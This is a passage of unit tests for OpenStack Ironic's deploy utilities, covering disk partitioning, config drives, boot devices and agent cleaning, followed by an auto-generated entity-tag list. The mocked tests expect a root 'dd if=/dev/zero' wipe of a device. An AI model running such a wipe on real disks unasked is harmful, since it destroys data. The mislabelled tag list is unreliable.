mock.call(ephemeral_part)]
self.assertRaises(exception.InstanceDeployFailure,
utils.work_on_disk, self.dev, self.root_mb,
self.swap_mb, ephemeral_mb, ephemeral_format,
self.image_path, 'fake-uuid')
self.assertEqual(self.mock_ibd.call_args_list, calls)
self.mock_mp.assert_called_once_with(self.dev, self.root_mb,
self.swap_mb, ephemeral_mb,
self.configdrive_mb, commit=True,
boot_option="netboot",
boot_mode="bios")
@mock.patch.object(common_utils, 'unlink_without_raise', autospec=True)
@mock.patch.object(utils, '_get_configdrive', autospec=True)
def test_no_configdrive_partition(self, mock_configdrive, mock_unlink):
mock_configdrive.return_value = (10, 'fake-path')
swap_part = '/dev/fake-part1'
configdrive_part = '/dev/fake-part2'
root_part = '/dev/fake-part3'
configdrive_url = 'http://127.0.0.1/cd'
configdrive_mb = 10
self.mock_mp.return_value = {'swap': swap_part,
'configdrive': configdrive_part,
'root': root_part}
self.mock_ibd.side_effect = iter([True, True, False])
calls = [mock.call(root_part),
mock.call(swap_part),
mock.call(configdrive_part)]
self.assertRaises(exception.InstanceDeployFailure,
utils.work_on_disk, self.dev, self.root_mb,
self.swap_mb, self.ephemeral_mb,
self.ephemeral_format, self.image_path, 'fake-uuid',
preserve_ephemeral=False,
configdrive=configdrive_url,
boot_option="netboot")
self.assertEqual(self.mock_ibd.call_args_list, calls)
self.mock_mp.assert_called_once_with(self.dev, self.root_mb,
self.swap_mb, self.ephemeral_mb,
configdrive_mb, commit=True,
boot_option="netboot",
boot_mode="bios")
mock_unlink.assert_called_once_with('fake-path')
@mock.patch.object(common_utils, 'execute', autospec=True)
class MakePartitionsTestCase(tests_base.TestCase):
def setUp(self):
super(MakePartitionsTestCase, self).setUp()
self.dev = 'fake-dev'
self.root_mb = 1024
self.swap_mb = 512
self.ephemeral_mb = 0
self.configdrive_mb = 0
self.parted_static_cmd = ['parted', '-a', 'optimal', '-s', self.dev,
'--', 'unit', 'MiB', 'mklabel', 'msdos']
def _test_make_partitions(self, mock_exc, boot_option):
mock_exc.return_value = (None, None)
utils.make_partitions(self.dev, self.root_mb, self.swap_mb,
self.ephemeral_mb, self.configdrive_mb,
boot_option=boot_option)
expected_mkpart = ['mkpart', 'primary', 'linux-swap', '1', '513',
'mkpart', 'primary', '', '513', '1537']
if boot_option == "local":
expected_mkpart.extend(['set', '2', 'boot', 'on'])
parted_cmd = self.parted_static_cmd + expected_mkpart
parted_call = mock.call(*parted_cmd, run_as_root=True,
check_exit_code=[0])
fuser_cmd = ['fuser', 'fake-dev']
fuser_call = mock.call(*fuser_cmd, run_as_root=True,
check_exit_code=[0, 1])
mock_exc.assert_has_calls([parted_call, fuser_call])
def test_make_partitions(self, mock_exc):
self._test_make_partitions(mock_exc, boot_option="netboot")
def test_make_partitions_local_boot(self, mock_exc):
self._test_make_partitions(mock_exc, boot_option="local")
def test_make_partitions_with_ephemeral(self, mock_exc):
self.ephemeral_mb = 2048
expected_mkpart = ['mkpart', 'primary', '', '1', '2049',
'mkpart', 'primary', 'linux-swap', '2049', '2561',
'mkpart', 'primary', '', '2561', '3585']
cmd = self.parted_static_cmd + expected_mkpart
mock_exc.return_value = (None, None)
utils.make_partitions(self.dev, self.root_mb, self.swap_mb,
self.ephemeral_mb, self.configdrive_mb)
parted_call = mock.call(*cmd, run_as_root=True, check_exit_code=[0])
mock_exc.assert_has_calls([parted_call])
@mock.patch.object(utils, 'get_dev_block_size', autospec=True)
@mock.patch.object(common_utils, 'execute', autospec=True)
class DestroyMetaDataTestCase(tests_base.TestCase):
def setUp(self):
super(DestroyMetaDataTestCase, self).setUp()
self.dev = 'fake-dev'
self.node_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
def test_destroy_disk_metadata(self, mock_exec, mock_gz):
mock_gz.return_value = 64
expected_calls = [mock.call('dd', 'if=/dev/zero', 'of=fake-dev',
'bs=512', 'count=36', run_as_root=True,
check_exit_code=[0]),
mock.call('dd', 'if=/dev/zero', 'of=fake-dev',
'bs=512', 'count=36', 'seek=28',
run_as_root=True,
check_exit_code=[0])]
utils.destroy_disk_metadata(self.dev, self.node_uuid)
mock_exec.assert_has_calls(expected_calls)
self.assertTrue(mock_gz.called)
def test_destroy_disk_metadata_get_dev_size_fail(self, mock_exec, mock_gz):
mock_gz.side_effect = processutils.ProcessExecutionError
expected_call = [mock.call('dd', 'if=/dev/zero', 'of=fake-dev',
'bs=512', 'count=36', run_as_root=True,
check_exit_code=[0])]
self.assertRaises(processutils.ProcessExecutionError,
utils.destroy_disk_metadata,
self.dev,
self.node_uuid)
mock_exec.assert_has_calls(expected_call)
def test_destroy_disk_metadata_dd_fail(self, mock_exec, mock_gz):
mock_exec.side_effect = processutils.ProcessExecutionError
expected_call = [mock.call('dd', 'if=/dev/zero', 'of=fake-dev',
'bs=512', 'count=36', run_as_root=True,
check_exit_code=[0])]
self.assertRaises(processutils.ProcessExecutionError,
utils.destroy_disk_metadata,
self.dev,
self.node_uuid)
mock_exec.assert_has_calls(expected_call)
self.assertFalse(mock_gz.called)
@mock.patch.object(common_utils, 'execute', autospec=True)
class GetDeviceBlockSizeTestCase(tests_base.TestCase):
def setUp(self):
super(GetDeviceBlockSizeTestCase, self).setUp()
self.dev = 'fake-dev'
self.node_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
def test_get_dev_block_size(self, mock_exec):
mock_exec.return_value = ("64", "")
expected_call = [mock.call('blockdev', '--getsz', self.dev,
run_as_root=True, check_exit_code=[0])]
utils.get_dev_block_size(self.dev)
mock_exec.assert_has_calls(expected_call)
@mock.patch.object(utils, 'dd', autospec=True)
@mock.patch.object(images, 'qemu_img_info', autospec=True)
@mock.patch.object(images, 'convert_image', autospec=True)
class PopulateImageTestCase(tests_base.TestCase):
def setUp(self):
super(PopulateImageTestCase, self).setUp()
def test_populate_raw_image(self, mock_cg, mock_qinfo, mock_dd):
type(mock_qinfo.return_value).file_format = mock.PropertyMock(
return_value='raw')
utils.populate_image('src', 'dst')
mock_dd.assert_called_once_with('src', 'dst')
self.assertFalse(mock_cg.called)
def test_populate_qcow2_image(self, mock_cg, mock_qinfo, mock_dd):
type(mock_qinfo.return_value).file_format = mock.PropertyMock(
return_value='qcow2')
utils.populate_image('src', 'dst')
mock_cg.assert_called_once_with('src', 'dst', 'raw', True)
self.assertFalse(mock_dd.called)
@mock.patch.object(utils, 'is_block_device', lambda d: True)
@mock.patch.object(utils, 'block_uuid', lambda p: 'uuid')
@mock.patch.object(utils, 'dd', lambda *_: None)
@mock.patch.object(images, 'convert_image', lambda *_: None)
@mock.patch.object(common_utils, 'mkfs', lambda *_: None)
# NOTE(dtantsur): destroy_disk_metadata resets file size, disabling it
@mock.patch.object(utils, 'destroy_disk_metadata', lambda *_: None)
class RealFilePartitioningTestCase(tests_base.TestCase):
"""This test applies some real-world partitioning scenario to a file.
This test covers the whole partitioning, mocking everything not possible
on a file. That helps us assure, that we do all partitioning math properly
and also conducts integration testing of DiskPartitioner.
"""
def setUp(self):
super(RealFilePartitioningTestCase, self).setUp()
# NOTE(dtantsur): no parted utility on gate-ironic-python26
try:
common_utils.execute('parted', '--version')
except OSError as exc:
self.skipTest('parted utility was not found: %s' % exc)
self.file = tempfile.NamedTemporaryFile(delete=False)
# NOTE(ifarkas): the file needs to be closed, so fuser won't report
# any usage
self.file.close()
# NOTE(dtantsur): 20 MiB file with zeros
common_utils.execute('dd', 'if=/dev/zero', 'of=%s' % self.file.name,
'bs=1', 'count=0', 'seek=20MiB')
@staticmethod
def _run_without_root(func, *args, **kwargs):
"""Make sure root is not required when using utils.execute."""
real_execute = common_utils.execute
def fake_execute(*cmd, **kwargs):
kwargs['run_as_root'] = False
return real_execute(*cmd, **kwargs)
with mock.patch.object(common_utils, 'execute', fake_execute):
return func(*args, **kwargs)
def test_different_sizes(self):
# NOTE(dtantsur): Keep this list in order with expected partitioning
fields = ['ephemeral_mb', 'swap_mb', 'root_mb']
variants = ((0, 0, 12), (4, 2, 8), (0, 4, 10), (5, 0, 10))
for variant in variants:
kwargs = dict(zip(fields, variant))
self._run_without_root(utils.work_on_disk, self.file.name,
ephemeral_format='ext4', node_uuid='',
image_path='path', **kwargs)
part_table = self._run_without_root(
disk_partitioner.list_partitions, self.file.name)
for part, expected_size in zip(part_table, filter(None, variant)):
self.assertEqual(expected_size, part['size'],
"comparison failed for %s" % list(variant))
def test_whole_disk(self):
# 6 MiB ephemeral + 3 MiB swap + 9 MiB root + 1 MiB for MBR
# + 1 MiB MAGIC == 20 MiB whole disk
# TODO(dtantsur): figure out why we need 'magic' 1 more MiB
# and why the is different on Ubuntu and Fedora (see below)
self._run_without_root(utils.work_on_disk, self.file.name,
root_mb=9, ephemeral_mb=6, swap_mb=3,
ephemeral_format='ext4', node_uuid='',
image_path='path')
part_table = self._run_without_root(
disk_partitioner.list_partitions, self.file.name)
sizes = [part['size'] for part in part_table]
# NOTE(dtantsur): parted in Ubuntu 12.04 will occupy the last MiB,
# parted in Fedora 20 won't - thus two possible variants for last part
self.assertEqual([6, 3], sizes[:2],
"unexpected partitioning %s" % part_table)
self.assertIn(sizes[2], (9, 10))
@mock.patch.object(image_cache, 'clean_up_caches', autospec=True)
def test_fetch_images(self, mock_clean_up_caches):
mock_cache = mock.MagicMock(
spec_set=['fetch_image', 'master_dir'], master_dir='master_dir')
utils.fetch_images(None, mock_cache, [('uuid', 'path')])
mock_clean_up_caches.assert_called_once_with(None, 'master_dir',
[('uuid', 'path')])
mock_cache.fetch_image.assert_called_once_with('uuid', 'path',
ctx=None,
force_raw=True)
@mock.patch.object(image_cache, 'clean_up_caches', autospec=True)
def test_fetch_images_fail(self, mock_clean_up_caches):
exc = exception.InsufficientDiskSpace(path='a',
required=2,
actual=1)
mock_cache = mock.MagicMock(
spec_set=['master_dir'], master_dir='master_dir')
mock_clean_up_caches.side_effect = iter([exc])
self.assertRaises(exception.InstanceDeployFailure,
utils.fetch_images,
None,
mock_cache,
[('uuid', 'path')])
mock_clean_up_caches.assert_called_once_with(None, 'master_dir',
[('uuid', 'path')])
@mock.patch.object(shutil, 'copyfileobj', autospec=True)
@mock.patch.object(requests, 'get', autospec=True)
class GetConfigdriveTestCase(tests_base.TestCase):
@mock.patch.object(gzip, 'GzipFile', autospec=True)
def test_get_configdrive(self, mock_gzip, mock_requests, mock_copy):
mock_requests.return_value = mock.MagicMock(
spec_set=['content'], content='Zm9vYmFy')
utils._get_configdrive('http://127.0.0.1/cd', 'fake-node-uuid')
mock_requests.assert_called_once_with('http://127.0.0.1/cd')
mock_gzip.assert_called_once_with('configdrive', 'rb',
fileobj=mock.ANY)
mock_copy.assert_called_once_with(mock.ANY, mock.ANY)
@mock.patch.object(gzip, 'GzipFile', autospec=True)
def test_get_configdrive_base64_string(self, mock_gzip, mock_requests,
mock_copy):
utils._get_configdrive('Zm9vYmFy', 'fake-node-uuid')
self.assertFalse(mock_requests.called)
mock_gzip.assert_called_once_with('configdrive', 'rb',
fileobj=mock.ANY)
mock_copy.assert_called_once_with(mock.ANY, mock.ANY)
def test_get_configdrive_bad_url(self, mock_requests, mock_copy):
mock_requests.side_effect = requests.exceptions.RequestException
self.assertRaises(exception.InstanceDeployFailure,
utils._get_configdrive, 'http://127.0.0.1/cd',
'fake-node-uuid')
self.assertFalse(mock_copy.called)
@mock.patch.object(base64, 'b64decode', autospec=True)
def test_get_configdrive_base64_error(self, mock_b64, mock_requests,
mock_copy):
mock_b64.side_effect = TypeError
self.assertRaises(exception.InstanceDeployFailure,
utils._get_configdrive,
'malformed', 'fake-node-uuid')
mock_b64.assert_called_once_with('malformed')
self.assertFalse(mock_copy.called)
@mock.patch.object(gzip, 'GzipFile', autospec=True)
def test_get_configdrive_gzip_error(self, mock_gzip, mock_requests,
mock_copy):
mock_requests.return_value = mock.MagicMock(
spec_set=['content'], content='Zm9vYmFy')
mock_copy.side_effect = IOError
self.assertRaises(exception.InstanceDeployFailure,
utils._get_configdrive, 'http://127.0.0.1/cd',
'fake-node-uuid')
mock_requests.assert_called_once_with('http://127.0.0.1/cd')
mock_gzip.assert_called_once_with('configdrive', 'rb',
fileobj=mock.ANY)
mock_copy.assert_called_once_with(mock.ANY, mock.ANY)
class VirtualMediaDeployUtilsTestCase(db_base.DbTestCase):
def setUp(self):
super(VirtualMediaDeployUtilsTestCase, self).setUp()
mgr_utils.mock_the_extension_manager(driver="iscsi_ilo")
info_dict = db_utils.get_test_ilo_info()
self.node = obj_utils.create_test_node(self.context,
driver='iscsi_ilo', driver_info=info_dict)
def test_get_single_nic_with_vif_port_id(self):
obj_utils.create_test_port(self.context, node_id=self.node.id,
address='aa:bb:cc', uuid=uuidutils.generate_uuid(),
extra={'vif_port_id': 'test-vif-A'}, driver='iscsi_ilo')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
address = utils.get_single_nic_with_vif_port_id(task)
self.assertEqual('aa:bb:cc', address)
class ParseInstanceInfoCapabilitiesTestCase(tests_base.TestCase):
def setUp(self):
super(ParseInstanceInfoCapabilitiesTestCase, self).setUp()
self.node = obj_utils.get_test_node(self.context, driver='fake')
def test_parse_instance_info_capabilities_string(self):
self.node.instance_info = {'capabilities': '{"cat": "meow"}'}
expected_result = {"cat": "meow"}
result = utils.parse_instance_info_capabilities(self.node)
self.assertEqual(expected_result, result)
def test_parse_instance_info_capabilities(self):
self.node.instance_info = {'capabilities': {"dog": "wuff"}}
expected_result = {"dog": "wuff"}
result = utils.parse_instance_info_capabilities(self.node)
self.assertEqual(expected_result, result)
def test_parse_instance_info_invalid_type(self):
self.node.instance_info = {'capabilities': 'not-a-dict'}
self.assertRaises(exception.InvalidParameterValue,
utils.parse_instance_info_capabilities, self.node)
def test_is_secure_boot_requested_true(self):
self.node.instance_info = {'capabilities': {"secure_boot": "tRue"}}
self.assertTrue(utils.is_secure_boot_requested(self.node))
def test_is_secure_boot_requested_false(self):
self.node.instance_info = {'capabilities': {"secure_boot": "false"}}
self.assertFalse(utils.is_secure_boot_requested(self.node))
def test_is_secure_boot_requested_invalid(self):
self.node.instance_info = {'capabilities': {"secure_boot": "invalid"}}
self.assertFalse(utils.is_secure_boot_requested(self.node))
def test_get_boot_mode_for_deploy_using_capabilities(self):
properties = {'capabilities': 'boot_mode:uefi,cap2:value2'}
self.node.properties = properties
result = utils.get_boot_mode_for_deploy(self.node)
self.assertEqual('uefi', result)
def test_get_boot_mode_for_deploy_using_instance_info_cap(self):
instance_info = {'capabilities': {'secure_boot': 'True'}}
self.node.instance_info = instance_info
result = utils.get_boot_mode_for_deploy(self.node)
self.assertEqual('uefi', result)
def test_get_boot_mode_for_deploy_using_instance_info(self):
instance_info = {'deploy_boot_mode': 'bios'}
self.node.instance_info = instance_info
result = utils.get_boot_mode_for_deploy(self.node)
self.assertEqual('bios', result)
class TrySetBootDeviceTestCase(db_base.DbTestCase):
def setUp(self):
super(TrySetBootDeviceTestCase, self).setUp()
mgr_utils.mock_the_extension_manager(driver="fake")
self.node = obj_utils.create_test_node(self.context, driver="fake")
@mock.patch.object(manager_utils, 'node_set_boot_device', autospec=True)
def test_try_set_boot_device_okay(self, node_set_boot_device_mock):
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
utils.try_set_boot_device(task, boot_devices.DISK,
persistent=True)
node_set_boot_device_mock.assert_called_once_with(
task, boot_devices.DISK, persistent=True)
@mock.patch.object(utils, 'LOG', autospec=True)
@mock.patch.object(manager_utils, 'node_set_boot_device', autospec=True)
def test_try_set_boot_device_ipmifailure_uefi(self,
node_set_boot_device_mock, log_mock):
self.node.properties = {'capabilities': 'boot_mode:uefi'}
self.node.save()
node_set_boot_device_mock.side_effect = exception.IPMIFailure(cmd='a')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
utils.try_set_boot_device(task, boot_devices.DISK,
persistent=True)
node_set_boot_device_mock.assert_called_once_with(
task, boot_devices.DISK, persistent=True)
log_mock.warning.assert_called_once_with(mock.ANY)
@mock.patch.object(manager_utils, 'node_set_boot_device', autospec=True)
def test_try_set_boot_device_ipmifailure_bios(
self, node_set_boot_device_mock):
node_set_boot_device_mock.side_effect = exception.IPMIFailure(cmd='a')
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
self.assertRaises(exception.IPMIFailure,
utils.try_set_boot_device,
task, boot_devices.DISK, persistent=True)
node_set_boot_device_mock.assert_called_once_with(
task, boot_devices.DISK, persistent=True)
@mock.patch.object(manager_utils, 'node_set_boot_device', autospec=True)
def test_try_set_boot_device_some_other_exception(
self, node_set_boot_device_mock):
exc = exception.IloOperationError(operation="qwe", error="error")
node_set_boot_device_mock.side_effect = exc
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
self.assertRaises(exception.IloOperationError,
utils.try_set_boot_device,
task, boot_devices.DISK, persistent=True)
node_set_boot_device_mock.assert_called_once_with(
task, boot_devices.DISK, persistent=True)
class AgentCleaningTestCase(db_base.DbTestCase):
def setUp(self):
super(AgentCleaningTestCase, self).setUp()
mgr_utils.mock_the_extension_manager(driver='fake_agent')
n = {'driver': 'fake_agent',
'driver_internal_info': {'agent_url': 'http://127.0.0.1:9999'}}
self.node = obj_utils.create_test_node(self.context, **n)
self.ports = [obj_utils.create_test_port(self.context,
node_id=self.node.id)]
self.clean_steps = {
'hardware_manager_version': '1',
'clean_steps': {
'GenericHardwareManager': [
{'interface': 'deploy',
'step': 'erase_devices',
'priority': 20},
],
'SpecificHardwareManager': [
{'interface': 'deploy',
'step': 'update_firmware',
'priority': 30},
{'interface': 'raid',
'step': 'create_raid',
'priority': 10},
]
}
}
@mock.patch('ironic.objects.Port.list_by_node_id',
spec_set=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'get_clean_steps',
autospec=True)
def test_get_clean_steps(self, client_mock, list_ports_mock):
client_mock.return_value = {
'command_result': self.clean_steps}
list_ports_mock.return_value = self.ports
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
response = utils.agent_get_clean_steps(task)
client_mock.assert_called_once_with(mock.ANY, task.node,
self.ports)
self.assertEqual('1', task.node.driver_internal_info[
'hardware_manager_version'])
# Since steps are returned in dicts, they have non-deterministic
# ordering
self.assertEqual(2, len(response))
self.assertIn(self.clean_steps['clean_steps'][
'GenericHardwareManager'][0], response)
self.assertIn(self.clean_steps['clean_steps'][
'SpecificHardwareManager'][0], response)
@mock.patch('ironic.objects.Port.list_by_node_id',
spec_set=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'get_clean_steps',
autospec=True)
def test_get_clean_steps_missing_steps(self, client_mock,
list_ports_mock):
del self.clean_steps['clean_steps']
client_mock.return_value = {
'command_result': self.clean_steps}
list_ports_mock.return_value = self.ports
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
self.assertRaises(exception.NodeCleaningFailure,
utils.agent_get_clean_steps,
task)
client_mock.assert_called_once_with(mock.ANY, task.node,
self.ports)
@mock.patch('ironic.objects.Port.list_by_node_id',
spec_set=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'execute_clean_step',
autospec=True)
def test_execute_clean_step(self, client_mock, list_ports_mock):
client_mock.return_value = {
'command_status': 'SUCCEEDED'}
list_ports_mock.return_value = self.ports
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
response = utils.agent_execute_clean_step(
task,
self.clean_steps['clean_steps']['GenericHardwareManager'][0])
self.assertEqual(states.CLEANING, response)
@mock.patch('ironic.objects.Port.list_by_node_id',
spec_set=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'execute_clean_step',
autospec=True)
def test_execute_clean_step_running(self, client_mock, list_ports_mock):
client_mock.return_value = {
'command_status': 'RUNNING'}
list_ports_mock.return_value = self.ports
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
response = utils.agent_execute_clean_step(
task,
self.clean_steps['clean_steps']['GenericHardwareManager'][0])
self.assertEqual(states.CLEANING, response)
@mock.patch('ironic.objects.Port.list_by_node_id',
spec_set=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'execute_clean_step',
autospec=True)
def test_execute_clean_step_version_mismatch(self, client_mock,
list_ports_mock):
client_mock.return_value = {
'command_status': 'RUNNING'}
list_ports_mock.return_value = self.ports
with task_manager.acquire(
self.context, self.node['uuid'], shared=False) as task:
response = utils.agent_execute_clean_step(
task,
self.clean_steps['clean_steps']['GenericHardwareManager'][0])
self.assertEqual(states.CLEANING, response)
@mock.patch.object(utils, 'is_block_device', autospec=True)
@mock.patch.object(utils, 'login_iscsi', lambda *_: None)
@mock.patch.object(utils, 'discovery', lambda *_: None)
@mock.patch.object(utils, 'logout_iscsi', lambda *_: None)
@mock.patch.object(utils, 'delete_iscsi', lambda *_: None)
@mock.patch.object(utils, 'get_dev', lambda *_: '/dev/fake')
class ISCSISetupAndHandleErrorsTestCase(tests_base.TestCase):
def test_no_parent_device(self, mock_ibd):
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
lun = 1
mock_ibd.return_value = False
expected_dev = '/dev/fake'
with testtools.ExpectedException(exception.InstanceDeployFailure):
with utils._iscsi_setup_and_handle_errors(
address, port, iqn, lun) as dev:
self.assertEqual(expected_dev, dev)
mock_ibd.assert_called_once_with(expected_dev)
def test_parent_device_yield(self, mock_ibd):
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
lun = 1
expected_dev = '/dev/fake'
mock_ibd.return_value = True
with utils._iscsi_setup_and_handle_errors(address, port,
iqn, lun) as dev:
self.assertEqual(expected_dev, dev)
mock_ibd.assert_called_once_with(expected_dev)
| 75,381 | [['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['DATE_TIME', '2012'], ['DATE_TIME', '2011'], ['DATE_TIME', '2011'], ['PERSON', 'Ilya Alekseyev'], ['LOCATION', 'TestCase'], ['PERSON', 'MagicMock(spec='], ['NRP', 'zip(mock_list'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['LOCATION', 'root_mb'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['LOCATION', 'root_mb'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['LOCATION', 'root_mb'], ['PERSON', 'mock.call.mkfs(dev=ephemeral_part'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['LOCATION', 'root_mb'], ['PERSON', 'unlink_without_raise'], ['PERSON', 'autospec=True'], ['PERSON', 'root_part'], ['PERSON', 'root_uuid'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['URL', 'mock.ca'], ['URL', 'mock.call.ma'], ['LOCATION', 'root_mb'], ['URL', 'self.as'], ['URL', 'mock.mo'], ['URL', 'self.as'], ['URL', 'unlink.as'], ['URL', 'mock.pa'], ['PERSON', 'autospec=True'], ['NRP', 'name_list'], ['LOCATION', 'mock.call.is_block_device(dev'], ['NRP', 'lun'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'mock_os.assert_called_once_with(check_dir'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'mock_update'], ['PERSON', 'MagicMock(spec='], ['NRP', 'zip(mock_list'], ['LOCATION', 'mock.call.work_on_disk(dev'], ['LOCATION', 'root_mb'], ['LOCATION', 'TestCase'], ['PERSON', 'fname'], ['URL', 'self.ad'], ['LOCATION', 'super(OtherFunctionTestCase'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['DATE_TIME', 'test_parse_root_device_hints(self'], ['LOCATION', 'utils.parse_root_device_hints'], ['LOCATION', 'utils.parse_root_device_hints'], ['LOCATION', 'TestCase'], ['LOCATION', 'super(WorkOnDiskTestCase'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'self.root_mb'], ['LOCATION', 'self.root_mb'], ['LOCATION', 'self.root_mb'], ['LOCATION', 'self.root_mb'], ['PERSON', 'root_part'], ['LOCATION', 'self.root_mb'], ['LOCATION', 'self.root_mb'], ['PERSON', 'unlink_without_raise'], ['PERSON', 'autospec=True'], ['URL', 'mock.pa'], ['PERSON', 'autospec=True'], ['URL', 'configdrive.re'], ['PERSON', 'root_part'], ['LOCATION', 'self.root_mb'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'ibd.ca'], ['LOCATION', 'self.root_mb'], ['URL', 'unlink.as'], ['URL', 'mock.pa'], ['PERSON', 'autospec=True'], ['LOCATION', 'TestCase'], ['LOCATION', 'super(MakePartitionsTestCase'], ['LOCATION', 'self.root_mb'], ['PERSON', 'run_as_root=True'], ['LOCATION', 'self.root_mb'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'TestCase'], ['LOCATION', 'super(DestroyMetaDataTestCase'], ['LOCATION', 'mock_exec'], ['PERSON', 'run_as_root=True'], ['LOCATION', 'mock_exec'], ['PERSON', 'run_as_root=True'], ['LOCATION', 'mock_exec'], ['PERSON', 'run_as_root=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'TestCase'], ['LOCATION', 'super(GetDeviceBlockSizeTestCase'], ['PERSON', 'autospec=True'], ['PERSON', 'qemu_img_info'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'TestCase'], ['LOCATION', 'mock_qinfo'], ['LOCATION', 'mock_qinfo'], ['LOCATION', 'RealFilePartitioningTestCase(tests_base'], ['LOCATION', 'TestCase'], ['LOCATION', 'super(RealFilePartitioningTestCase'], ['PERSON', 'self.file.close'], ['DATE_TIME', 'zip(part_table'], ['PERSON', 'Fedora'], ['DATE_TIME', 'Fedora 20'], ['LOCATION', 'self.assertEqual([6'], ['PERSON', 'autospec=True'], ['PERSON', 'utils.fetch_images(None'], ['PERSON', 'autospec=True'], ['LOCATION', 'utils.fetch_images'], ['PERSON', 'mock_cache'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'TestCase'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['URL', 'requests.si'], ['LOCATION', 'b64decode'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'VirtualMediaDeployUtilsTestCase(db_base'], ['LOCATION', 'TestCase'], ['PERSON', 'autospec=True'], ['PERSON', 'boot_devices'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', "IPMIFailure(cmd='a"], ['PERSON', 'boot_devices'], ['PERSON', 'autospec=True'], ['PERSON', "IPMIFailure(cmd='a"], ['PERSON', 'boot_devices'], ['PERSON', 'boot_devices'], ['PERSON', 'autospec=True'], ['NRP', 'node_set_boot_device_mock.side_effect'], ['PERSON', 'boot_devices'], ['PERSON', 'boot_devices'], ['URL', 'self.no'], ['URL', 'utils.cr'], ['URL', 'self.co'], ['PERSON', "self.assertEqual('1"], ['LOCATION', 'test_get_clean_steps_missing_steps(self'], ['PERSON', 'autospec=True'], ['LOCATION', 'ISCSISetupAndHandleErrorsTestCase(tests_base'], ['LOCATION', 'TestCase'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'ironic.com'], ['URL', 'ironic.com'], ['URL', 'ironic.com'], ['URL', 'ironic.com'], ['URL', 'ironic.com'], ['URL', 'ironic.com'], ['URL', 'ironic.co'], ['URL', 'ironic.co'], ['URL', 'ironic.drivers.mo'], ['URL', 'ironic.drivers.mo'], ['URL', 'ironic.drivers.mo'], ['URL', 'ironic.tests.co'], ['URL', 'mock.pa'], ['URL', 'mock.pa'], ['URL', 'patcher.st'], ['URL', 'self.ad'], ['URL', 'patcher.st'], ['URL', 'mock.Ma'], ['URL', 'mock.at'], ['URL', 'mock.ge'], ['URL', 'dev.re'], ['URL', 'mock.ge'], ['URL', 'mb.re'], ['URL', 'mock.is'], ['URL', 'device.re'], ['URL', 'uuid.re'], ['URL', 'mock.ma'], ['URL', 'partitions.re'], ['URL', 'mock.call.ge'], ['URL', 'mock.call.ge'], ['URL', 'mock.ca'], ['URL', 'mock.ca'], ['URL', 